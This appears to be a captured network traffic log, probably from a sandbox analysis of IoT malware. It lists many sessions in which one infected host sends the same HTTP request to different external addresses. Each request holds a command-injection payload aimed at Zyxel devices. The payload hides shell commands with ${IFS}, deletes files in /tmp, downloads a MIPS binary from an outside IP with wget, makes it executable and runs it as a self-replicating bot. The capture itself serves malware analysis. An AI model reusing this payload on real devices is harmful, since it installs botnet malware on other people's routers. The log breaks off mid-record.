                                    Jan 13, 2024 19:02:33.156414032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4216192.168.2.1343382146.40.240.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156439066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4217192.168.2.1346866186.1.101.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156482935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4218192.168.2.1337506136.179.22.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156502008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4219192.168.2.134293494.25.71.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156555891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4220192.168.2.134328063.66.105.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156579018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4221192.168.2.1349674158.98.106.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156625032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4222192.168.2.133463879.236.245.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156661987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4223192.168.2.134535243.22.156.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156687021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4224192.168.2.1347024141.56.154.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156749010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4225192.168.2.134627451.79.61.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156769037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4226192.168.2.133641636.73.197.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156836033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4227192.168.2.1347566104.223.78.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156887054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4228192.168.2.134144043.127.115.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156915903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4229192.168.2.135287287.182.175.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156953096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4230192.168.2.1337148202.131.253.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156979084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4231192.168.2.133392665.175.132.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.156997919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4232192.168.2.134056690.63.117.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157033920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4233192.168.2.1337208185.78.121.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157057047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4234192.168.2.1347212108.5.86.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157109976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4235192.168.2.1352498139.144.193.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157180071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4236192.168.2.135383049.132.83.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157201052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4237192.168.2.1341866204.5.17.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157234907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4238192.168.2.135904290.115.105.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157268047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4239192.168.2.134387292.67.140.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157285929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4240192.168.2.1341104170.199.6.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157334089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4241192.168.2.1349024123.140.33.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157367945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4242192.168.2.1338342211.112.48.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157419920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4243192.168.2.1337020164.33.18.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157463074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4244192.168.2.133951893.198.57.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157519102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4245192.168.2.135877231.133.124.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157540083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4246192.168.2.1344372197.3.9.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157579899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4247192.168.2.1338592222.50.221.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157596111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4248192.168.2.1344840134.191.135.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157624960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4249192.168.2.135477681.183.206.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157653093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4250192.168.2.133546681.4.176.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157685041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4251192.168.2.1345080153.246.147.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157731056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4252192.168.2.1343502212.156.4.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157785892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4253192.168.2.135143246.10.33.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157799006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4254192.168.2.1357468162.58.9.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157845020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4255192.168.2.1353008130.82.29.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157869101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4256192.168.2.1360084118.147.245.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157913923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4257192.168.2.1339160155.155.208.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157958031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4258192.168.2.1347182121.243.196.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157958984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4259192.168.2.1341180106.245.86.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.157999992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4260192.168.2.1346944219.75.141.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158020973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4261192.168.2.1333922183.211.66.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158058882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4262192.168.2.134518048.127.174.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158106089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4263192.168.2.1359098174.27.23.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158144951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4264192.168.2.133894692.188.123.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158200979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4265192.168.2.1345482204.42.120.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158225060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4266192.168.2.1347502100.215.42.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158255100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4267192.168.2.1334014106.83.124.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158288002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4268192.168.2.1343656109.211.96.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158314943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4269192.168.2.1342718220.81.47.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158340931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4270192.168.2.1355726209.6.60.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158399105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4271192.168.2.1336858174.177.0.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158436060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4272192.168.2.1339050158.141.202.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158493042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4273192.168.2.134251658.102.66.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158534050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4274192.168.2.135330070.91.143.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158549070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4275192.168.2.1358702212.161.1.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158601999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4276192.168.2.1343660202.233.176.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158651114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4277192.168.2.1341810187.248.50.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:33.158685923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4278192.168.2.13596369.120.82.123443
                                    TimestampBytes transferredDirectionData
